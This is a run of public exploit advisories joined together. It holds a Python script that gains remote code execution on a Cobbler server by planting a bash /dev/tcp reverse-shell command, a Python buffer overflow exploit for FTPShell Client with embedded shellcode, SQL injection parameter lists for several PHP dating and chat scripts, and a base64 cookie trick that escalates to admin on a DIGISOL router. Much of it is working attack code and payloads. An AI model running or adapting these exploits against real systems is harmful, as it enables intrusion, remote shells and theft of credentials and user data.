# Exploit title: Cobbler 2.8.x Authenticated RCE.
# Author: Dolev Farhi
# Contact: dolevf at protonmail.com (@hack6tence)
# Date: 03-16-2017
# Vendor homepage: cobbler.github.io
# Software version: v.2.5.160805
Software Description
=====================
Cobbler is a Linux installation server that allows for rapid setup of network installation environments. It glues together and automates many associated Linux tasks so you do not have to hop between many various commands and applications when deploying new systems, and, in some cases, changing existing ones.
Cobbler can help with provisioning, managing DNS and DHCP, package updates, power management, configuration management orchestration, and much more.
Vulnerability Description
=========================
Authenticated RCE
"""
import uuid
import sys
import requests
# Custom variables
cobbler_server = 'http://192.168.2.235/cobbler_web/'
cobbler_user = 'cobbler'
cobbler_pass = 'cobbler'
netcat_listener = '192.168.2.51/4444'
# Cobbler variables
cobbler_url = '%s/do_login' % cobbler_server
cobbler_settings_url = '%s/setting/save' % cobbler_server
cobbler_reposync = '%s/reposync' % cobbler_server
cobbler_reposave = '%s/repo/save' % cobbler_server
cobbler_repo_name = str(uuid.uuid4()).split('-')[0]
class Cobbler():
def __init__(self):
self.client = requests.session()
self.client.get('%s' % cobbler_server)
self.csrftoken = self.client.cookies['csrftoken']
self.headers = dict(Referer=cobbler_url)
self.login_data = dict(csrfmiddlewaretoken=self.csrftoken, next='/cobbler_web', username=cobbler_user, password=cobbler_pass)
self.client.post(cobbler_url, data=self.login_data, headers=self.headers)
def create_repo(self):
print("Creating dummy repository...")
self.repoinfo = dict(
csrfmiddlewaretoken=self.csrftoken,
editmode='new',
subobject='False',
submit='Save',
arch='i386',
breed='yum',
comment='',
keep_updated='',
mirror='',
name=cobbler_repo_name,
owners='admin',
rpm_list='',
proxy='',
apt_components='',
apt_dists='',
createrepo_flags='',
environment='',
mirror_locally='',
priority='99',
yumopts='')
self.client.post(cobbler_reposave, data=self.repoinfo, headers=self.headers)
def post_payload(self):
print("Configuring reposync flags with the payload...")
self.payload = dict(csrfmiddlewaretoken=self.csrftoken, editmode='edit', subobject='False', submit='Save', name='reposync_flags', value='-h; bash -i >& /dev/tcp/%s 0>&1 &' % netcat_listener)
self.client.post(cobbler_settings_url, data=self.payload, headers=self.headers)
def get_shell(self):
self.create_repo()
self.post_payload()
print("Executing repository sync... expecting reverse shell. this may take a few seconds.")
self.client.post(cobbler_reposync, data={'csrfmiddlewaretoken':self.csrftoken}, headers=self.headers)
if __name__ == '__main__':
cobbler = Cobbler()
cobbler.get_shell()
sys.exit()
print '''
##############################################
# Created: ScrR1pTK1dd13 #
# Name: Greg Priest #
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
##############################################
# Exploit Title: FTPShell Client 6.53 Session name BufferOverflow
# Date: 2017.03.17
# Exploit Author: Greg Priest
# Version: FTPShell Client 6.53
# Tested on: Windows7 x64 HUN/ENG Professional
'''
a = "A" * 460
b = '\xDC\xE8\x65\x76'
nop = '\x90' * 10
c = "C" * 1638
#calc.exe
shellcode =(
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
"\x53\x53\x53\x53\x52\x53\xff\xd7")
evilstring = a+b+nop+shellcode+c
file = open ('evilstring.txt', "w")
file.write(evilstring)
file.close
print evilstring
# # # # #
# Exploit Title: iFdate Social Dating Script v2.0 - SQL Injection
# Google Dork: N/A
# Date: 18.03.2017
# Vendor Homepage: http://turnkeycentral.com/
# Software: http://turnkeycentral.com/scripts/social-dating-script/
# Demo: http://demo.turnkeycentral.com/ifdate/index.php
# Version: 2.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/members_search_results.php?gender=[SQL]
# http://localhost/[PATH]/members_search_results.php?sexuality=[SQL]
# http://localhost/[PATH]/members_search_results.php?marital=[SQL]
# http://localhost/[PATH]/members_search_results.php?ethnic=[SQL]
# http://localhost/[PATH]/members_search_results.php?country=[SQL]
# http://localhost/[PATH]/members_search_results.php?picture=[SQL]
# http://localhost/[PATH]/members_search_results.php?online=[SQL]
# http://localhost/[PATH]/my_profile_error.php?error_name=[SQL]
# http://localhost/[PATH]/my_profile_pictures.php?username=[SQL]
# http://localhost/[PATH]/my_profile_buddies.php?username=[SQL]
# http://localhost/[PATH]/my_profile_videos.php?username=[SQL]
# http://localhost/[PATH]/my_profile.php?username=[SQL]
# http://localhost/[PATH]/my_profile_guestbook.php?username=[SQL]
# members :id
# members :username
# members :email
# members :password
# members :signup_date
# members :signup_ip
# members :banned
# members :active
# members :is_admin
# Etc..
# # # # #
Title:
======
Cookie based privilege escalation in DIGISOL DG-HR1400 1.00.02 wireless router.
CVE Details:
============
CVE-2017-6896
Reference:
==========
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6896
https://vuldb.com/sv/?id.97954
https://www.indrajithan.com/DIGISOL_router_previlage_escaltion
Credit:
======
Name: Indrajith.A.N
Website: https://www.indrajithan.com
Date:
====
13-03-2017
Vendor:
======
DIGISOL router is a product of Smartlink Network Systems Ltd. is one of India's leading networking company. It was established in the year 1993 to prop the Indian market in the field of Network Infrastructure.
Product:
=======
DIGISOL DG-HR1400 is a wireless Router
Product link: http://wifi.digisol.com/datasheets/DG-HR1400.pdf
Abstract details:
=================
privilege escalation vulnerability in the DIGISOL DG-HR1400 wireless router enables an attacker escalate his user privilege to an admin just by modifying the Base64encoded session cookie value
Affected Version:
=============
<=1.00.02
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
8
Proof Of Concept :
==================
1) Login to the router as a User where router sets the session cookie value to VVNFUg== (Base64 encode of "USER")
2) So Encode "ADMIN" to base64 and force set the session cookie value to QURNSU4=
3) Refresh the page and you are able to escalate your USER privileges to ADMIN.
Disclosure Timeline:
======================================
Vendor Notification: 13/03/17
# # # # #
# Exploit Title: Omegle Clone - SQL Injection
# Google Dork: N/A
# Date: 18.03.2017
# Vendor Homepage: http://turnkeycentral.com/
# Software: http://www.turnkeycentral.com/scripts/omegle-clone/
# Demo: http://demo.turnkeycentral.com/omegleclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/randomChat.php?userId=[SQL]
# http://localhost/[PATH]/listenToReceive.php?userId=[SQL]
# http://localhost/[PATH]/typing.php?userId=[SQL]
# http://localhost/[PATH]/isTyping.php?strangerId=[SQL]
# http://localhost/[PATH]/saveLog.php?userId=[SQL]
# pc_settings :AdminID
# pc_settings :AdminPass
# pc_settings :Email
# pc_settings :PayPal
# pc_settings :IpnMode
# Etc..
# # # # #
# # # # #
# Exploit Title: Secure Download Links - SQL Injection
# Google Dork: N/A
# Date: 19.03.2017
# Vendor Homepage: http://sixthlife.net/
# Software: http://sixthlife.net/product/secure-download-links/
# Demo: http://www.satyamtechnologies.net/secdown/example.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# #ihsansencan
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/download.php?dc=[SQL]
# # # # #